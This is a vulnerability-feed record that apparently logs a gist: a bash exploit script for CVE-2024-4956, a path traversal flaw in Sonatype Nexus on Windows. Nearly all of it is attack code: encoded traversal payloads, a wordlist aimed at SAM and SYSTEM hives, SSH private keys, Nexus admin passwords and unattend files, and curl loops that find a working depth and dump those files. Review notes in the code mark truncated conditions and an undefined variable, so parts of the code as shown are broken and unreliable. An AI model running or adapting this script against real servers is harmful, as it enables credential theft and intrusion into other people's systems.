{"uuid": "a6831b7c-5d64-4555-b1ce-ea14b8adb579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://gist.github.com/stillbigjosh/345cd67cfb56e7e4f4f7eb9da9c20127", "content": "#!/bin/bash\n# CVE-2024-4956 - Sonatype Nexus Repository Manager Path Traversal\n# Windows-compatible version with embedded wordlists\n\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nCYAN='\\033[0;36m'\nNC='\\033[0m'\n\n# Traversal payload variations - the key difference for Windows\nTRAVERSALS=(\n    \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..\"\n    # Encoded backslash variations\n    \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..\"\n    \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..\"\n    # Mixed slash variations\n    \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%2F..%5C..%2F..%5C..%2F..\"\n    # Fewer leading slashes\n    \"/%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n    \"/%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n)\n\n# Windows file wordlist - forward slashes (curl handles this)\nWIN_FILES=(\n    # === PROOF OF VULN ===\n    \"Windows/win.ini\"\n    \"Windows/System32/drivers/etc/hosts\"\n    \"Windows/System32/license.rtf\"\n    \"Windows/System32/config/RegBack/SAM\"\n\n    # === NEXUS CONFIG - Standard install paths ===\n    # Default: C:\\nexus or C:\\Program Files\\nexus\n    \"nexus/sonatype-work/nexus3/etc/nexus.properties\"\n    \"nexus/sonatype-work/nexus3/admin.password\"\n    
\"nexus/sonatype-work/nexus3/etc/nexus-default.properties\"\n    \"nexus/sonatype-work/nexus3/log/nexus.log\"\n    \"nexus/sonatype-work/nexus3/log/request.log\"\n    \"nexus/sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n    \"nexus/sonatype-work/nexus3/db/security\"\n    \"nexus/sonatype-work/nexus3/keystores/node/keystore.properties\"\n    \"nexus/etc/nexus-default.properties\"\n    \"nexus/bin/nexus.vmoptions\"\n\n    # Program Files variations\n    \"Program Files/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n    \"Program Files/nexus/sonatype-work/nexus3/admin.password\"\n    \"Program Files/nexus/sonatype-work/nexus3/etc/nexus-default.properties\"\n    \"Program Files/nexus/sonatype-work/nexus3/log/nexus.log\"\n    \"Program Files/nexus/sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n    \"Program Files/nexus/etc/nexus-default.properties\"\n    \"Program Files/nexus/bin/nexus.vmoptions\"\n\n    # Sonatype under Program Files\n    \"Program Files/sonatype/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n    \"Program Files/sonatype/nexus/sonatype-work/nexus3/admin.password\"\n    \"Program Files/sonatype/sonatype-work/nexus3/etc/nexus.properties\"\n    \"Program Files/sonatype/sonatype-work/nexus3/admin.password\"\n\n    # Standalone sonatype-work at root\n    \"sonatype-work/nexus3/etc/nexus.properties\"\n    \"sonatype-work/nexus3/admin.password\"\n    \"sonatype-work/nexus3/etc/nexus-default.properties\"\n    \"sonatype-work/nexus3/log/nexus.log\"\n    \"sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n    \"sonatype-work/nexus3/db/security\"\n\n    # nexus3 variations (flattened)\n    \"nexus3/etc/nexus.properties\"\n    \"nexus3/admin.password\"\n    \"nexus3/etc/nexus-default.properties\"\n    \"nexus3/log/nexus.log\"\n\n    # opt style (sometimes mimicked on Windows)\n    \"opt/sonatype/sonatype-work/nexus3/etc/nexus.properties\"\n    \"opt/sonatype/sonatype-work/nexus3/admin.password\"\n\n    # === SONARQUBE CONFIG 
===\n    \"sonarqube/conf/sonar.properties\"\n    \"sonarqube/conf/wrapper.conf\"\n    \"sonarqube/logs/sonar.log\"\n    \"sonarqube/logs/web.log\"\n    \"sonarqube/logs/ce.log\"\n    \"sonarqube/logs/es.log\"\n    \"Program Files/sonarqube/conf/sonar.properties\"\n    \"Program Files/sonarqube/conf/wrapper.conf\"\n    \"Program Files/SonarQube/conf/sonar.properties\"\n    \"Program Files/SonarQube/conf/wrapper.conf\"\n    \"SonarQube/conf/sonar.properties\"\n    \"opt/sonarqube/conf/sonar.properties\"\n\n    # === USERS & CREDENTIALS ===\n    \"Users/Administrator/.ssh/id_rsa\"\n    \"Users/Administrator/.ssh/authorized_keys\"\n    \"Users/Administrator/Desktop/flag.txt\"\n    \"Users/Administrator/Desktop/root.txt\"\n    \"Users/Administrator/.bash_history\"\n    \"Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt\"\n    \"Users/nexus/.ssh/id_rsa\"\n    \"Users/nexus/Desktop/flag.txt\"\n    \"Users/sonar/.ssh/id_rsa\"\n    \"Users/sonar/Desktop/flag.txt\"\n    \"Users/svc_nexus/.ssh/id_rsa\"\n    \"Users/svc_sonar/.ssh/id_rsa\"\n\n    # All users PS history (NOTE(review): this repeats the Administrator entry above; no other profile is listed)\n    \"Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt\"\n\n    # === IIS / WEB CONFIG ===\n    \"inetpub/wwwroot/web.config\"\n    \"inetpub/wwwroot/appsettings.json\"\n\n    # === SYSTEM FILES ===\n    \"Windows/debug/NetSetup.LOG\"\n    \"Windows/System32/inetsrv/config/applicationHost.config\"\n    \"Windows/repair/SAM\"\n    \"Windows/repair/SYSTEM\"\n    \"Windows/Panther/Unattend.xml\"\n    \"Windows/Panther/unattend.xml\"\n    \"Windows/Panther/Unattended.xml\"\n    \"Windows/Panther/unattend/Unattend.xml\"\n    \"Windows/System32/sysprep/Unattend.xml\"\n    \"Windows/System32/sysprep/unattend.xml\"\n    \"ProgramData/unattend.xml\"\n    # NOTE(review): the live hives under System32/config are normally held open by the OS, so these reads are expected to fail even when the traversal works; the repair/ and RegBack copies are the realistic targets\n    \"Windows/System32/config/SAM\"\n    \"Windows/System32/config/SYSTEM\"\n    \"Windows/System32/config/SECURITY\"\n)\n\n# C:\\ prefixed versions (url-encoded C: = 
C%3A or just C:)\nWIN_FILES_CDRIVE=(\n    \"C:/Windows/win.ini\"\n    \"C:/Windows/System32/drivers/etc/hosts\"\n    \"C:/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n    \"C:/nexus/sonatype-work/nexus3/admin.password\"\n    \"C:/sonatype-work/nexus3/etc/nexus.properties\"\n    \"C:/sonatype-work/nexus3/admin.password\"\n    \"C:/Program Files/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n    \"C:/Program Files/nexus/sonatype-work/nexus3/admin.password\"\n    \"C:/sonarqube/conf/sonar.properties\"\n    \"C:/Program Files/sonarqube/conf/sonar.properties\"\n    \"C:/Users/Administrator/Desktop/flag.txt\"\n    \"C:/Windows/Panther/Unattend.xml\"\n)\n\n# Fetch one file through one traversal prefix. Returns 0 on a hit, 1 otherwise.\n# Arguments: base URL, traversal prefix, file path (wordlist entry).\nexploit_single() {\n    local base_url=\"$1\"\n    local traversal=\"$2\"\n    local filepath=\"$3\"\n    # Only space and '/' are encoded; a ':' in a C:-prefixed path is sent literally here, unlike the %3A used in scan_mode's C: loop\n    local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g')\n    local url=\"${base_url}${traversal}%2F${encoded_file}\"\n\n    # --path-as-is keeps curl from collapsing the ../ sequences client-side.\n    # NOTE(review): -k disables TLS certificate verification and 2>/dev/null hides curl errors (DNS, connect, timeout), so a network failure is indistinguishable from a miss\n    response=$(curl -s -o /dev/null -w \"%{http_code}:%{size_download}\" --path-as-is -k \"$url\" 2>/dev/null)\n    local code=\"${response%%:*}\"\n    local size=\"${response##*:}\"\n\n    if [[ \"$code\" == \"200\" && \"$size\" -gt 0 ]]; then\n        content=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n        # Filter out empty/default error pages\n        # NOTE(review): the remainder of this condition and the write to lfi_${safe_name}.txt are truncated in this copy (an angle-bracketed span was most likely stripped as HTML); safe_name is never defined in the visible text. Restore from the original gist before running\n        if [[ -n \"$content\" && ! \"$content\" =~ \"Nexus Repository Manager\" && ! \"$content\" =~ \" \"lfi_${safe_name}.txt\"\n            return 0\n        fi\n    fi\n    return 1\n}\n\n# Auto-scan: find a traversal prefix that returns win.ini, then dump the wordlist through it.\nscan_mode() {\n    local base_url=\"$1\"\n    local found=0\n\n    echo -e \"${YELLOW}[*] Phase 1: Finding working traversal depth with win.ini...${NC}\"\n    local working_traversal=\"\"\n\n    for trav in \"${TRAVERSALS[@]}\"; do\n        local url=\"${base_url}${trav}%2FWindows%2Fwin.ini\"\n        response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n        # Quoted pattern: =~ matches the literal text [fonts] / [extensions], not a character class\n        if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n            echo -e \"${GREEN}[+] VULNERABLE! 
Working traversal found${NC}\"\n            echo -e \"${GREEN}    Traversal: ${trav}${NC}\"\n            echo -e \"${CYAN}${response}${NC}\"\n            working_traversal=\"$trav\"\n            break\n        fi\n    done\n\n    # Also try C: prefixed\n    if [[ -z \"$working_traversal\" ]]; then\n        echo -e \"${YELLOW}[*] Trying C: prefixed paths...${NC}\"\n        for trav in \"${TRAVERSALS[@]}\"; do\n            local url=\"${base_url}${trav}%2FC%3A%2FWindows%2Fwin.ini\"\n            response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n            if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n                echo -e \"${GREEN}[+] VULNERABLE with C: prefix!${NC}\"\n                echo -e \"${GREEN}    Traversal: ${trav} + C:${NC}\"\n                # Sentinel suffix: Phase 2 strips it and switches to the C:-prefixed encoding\n                working_traversal=\"${trav}__CDRIVE__\"\n                break\n            fi\n        done\n    fi\n\n    # Also try backslash-encoded paths\n    if [[ -z \"$working_traversal\" ]]; then\n        echo -e \"${YELLOW}[*] Trying backslash-encoded traversals...${NC}\"\n        for trav in \"${TRAVERSALS[@]}\"; do\n            local url=\"${base_url}${trav}%5CWindows%5Cwin.ini\"\n            response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n            if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n                echo -e \"${GREEN}[+] VULNERABLE with backslash encoding!${NC}\"\n                # Sentinel suffix: Phase 2 strips it and encodes separators as %5C\n                working_traversal=\"${trav}__BACKSLASH__\"\n                break\n            fi\n        done\n    fi\n\n    # NOTE(review): because curl errors are silenced, this branch is also reached when the target is unreachable or the URL is wrong\n    if [[ -z \"$working_traversal\" ]]; then\n        echo -e \"${RED}[-] No working traversal found. 
Target may not be vulnerable.${NC}\"\n        echo -e \"${YELLOW}[*] Trying all combinations brute force anyway...${NC}\"\n        # Brute force: try the first 5 traversals against high-value targets\n        for trav in \"${TRAVERSALS[@]:0:5}\"; do\n            for filepath in \"Windows/win.ini\" \"nexus/sonatype-work/nexus3/admin.password\" \\\n                            \"sonatype-work/nexus3/admin.password\" \"nexus3/admin.password\" \\\n                            \"sonarqube/conf/sonar.properties\"; do\n                exploit_single \"$base_url\" \"$trav\" \"$filepath\" && ((found++))\n                # C: prefix (NOTE(review): exploit_single leaves the ':' unencoded, unlike the %3A used in Phase 2 below)\n                exploit_single \"$base_url\" \"$trav\" \"C:/${filepath}\" && ((found++))\n            done\n        done\n        echo -e \"${YELLOW}[*] Brute force done. ${found} hits.${NC}\"\n        return\n    fi\n\n    echo \"\"\n    echo -e \"${YELLOW}[*] Phase 2: Dumping files with working traversal...${NC}\"\n    echo \"\"\n\n    if [[ \"$working_traversal\" == *\"__CDRIVE__\"* ]]; then\n        local real_trav=\"${working_traversal/__CDRIVE__/}\"\n        for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n            local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g; s/:/%3A/g')\n            local url=\"${base_url}${real_trav}%2F${encoded_file}\"\n            response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n            local size=${#response}\n            # NOTE(review): the rest of this condition and the write to lfi_${safe_name}.txt are truncated in this copy; safe_name is never defined in the visible text\n            if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n                ((found++))\n            fi\n        done\n    elif [[ \"$working_traversal\" == *\"__BACKSLASH__\"* ]]; then\n        local real_trav=\"${working_traversal/__BACKSLASH__/}\"\n        for filepath in \"${WIN_FILES[@]}\"; do\n            local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%5C/g')\n            local url=\"${base_url}${real_trav}%5C${encoded_file}\"\n            response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n            local size=${#response}\n            # NOTE(review): same truncation as above; restore from the original gist before running\n            if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n                ((found++))\n            fi\n        done\n    else\n        # Standard forward-slash traversal\n        for filepath in \"${WIN_FILES[@]}\"; do\n            exploit_single \"$base_url\" \"$working_traversal\" \"$filepath\" && ((found++))\n        done\n        # Also try C: prefixed\n        echo -e \"${YELLOW}[*] Phase 3: Trying C: prefixed paths...${NC}\"\n        for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n            local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g; s/:/%3A/g')\n            local url=\"${base_url}${working_traversal}%2F${encoded_file}\"\n            response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n            local size=${#response}\n            # NOTE(review): same truncation as above; restore from the original gist before running\n            if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n                ((found++))\n            fi\n        done\n    fi\n\n    echo \"\"\n    echo -e \"${YELLOW}[*] Scan complete. 
${found} files retrieved.${NC}\"\n}\n\n# Single-file mode: try every traversal prefix for one user-supplied path.\nsingle_mode() {\n    local base_url=\"$1\"\n    local filepath=\"$2\"\n    local found=0\n\n    echo -e \"${YELLOW}[*] Trying all traversal variations for: ${filepath}${NC}\"\n    # NOTE(review): the path goes through exploit_single, which encodes only space and '/'; a C:-prefixed path keeps its literal ':'\n    for trav in \"${TRAVERSALS[@]}\"; do\n        exploit_single \"$base_url\" \"$trav\" \"$filepath\" && ((found++))\n    done\n\n    if [[ \"$found\" -eq 0 ]]; then\n        echo -e \"${RED}[-] No hits for ${filepath}${NC}\"\n    fi\n}\n\nusage() {\n    echo \"CVE-2024-4956 - Nexus Repository Manager LFI (Windows)\"\n    echo \"\"\n    echo \"Usage:\"\n    echo \"  $0 -u http://TARGET:PORT              # Auto-scan with embedded wordlist\"\n    echo \"  $0 -u http://TARGET:PORT -f FILE       # Single file mode\"\n    echo \"\"\n    echo \"Examples:\"\n    echo \"  $0 -u http://172.16.210.21:8081\"\n    echo \"  $0 -u http://172.16.210.21:8081 -f Windows/win.ini\"\n}\n\nmain() {\n    local target_url=\"\"\n    local target_file=\"\"\n\n    while getopts \"u:f:h\" opt; do\n        case $opt in\n            u) target_url=\"$OPTARG\" ;;\n            f) target_file=\"$OPTARG\" ;;\n            h) usage; exit 0 ;;\n            *) usage; exit 1 ;;\n        esac\n    done\n\n    if [[ -z \"$target_url\" ]]; then\n        usage\n        exit 1\n    fi\n\n    # Strip trailing slash\n    target_url=\"${target_url%/}\"\n\n    echo -e \"${CYAN}=== CVE-2024-4956 Nexus LFI - Windows Mode ===${NC}\"\n    echo -e \"${CYAN}Target: ${target_url}${NC}\"\n    echo \"\"\n\n    if [[ -n \"$target_file\" ]]; then\n        single_mode \"$target_url\" \"$target_file\"\n    else\n        scan_mode \"$target_url\"\n    fi\n}\n\nmain \"$@\"", "creation_timestamp": "2026-06-23T09:55:43.000000Z"}